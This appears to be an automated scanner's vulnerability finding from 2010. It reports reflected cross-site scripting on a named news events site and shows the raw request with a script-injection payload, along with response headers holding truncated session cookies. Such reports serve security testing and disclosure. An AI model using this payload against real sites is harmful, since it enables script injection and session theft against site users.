1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://events.contra |
Path: | / |
GET /?7a220"><script>alert(1)< Host: events.contracostatimes Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 07 Dec 2010 23:17:08 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 174.121.222.18 X-Runtime: 45 ETag: "ead0b258d62897e359c Cache-Control: private, max-age=0, must-revalidate Set-Cookie: welcome=jHkO9GCpnUIX Set-Cookie: zvents_tracker_sid Set-Cookie: _zsess=BAh7BzoPc2Vzc Content-Length: 98077 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |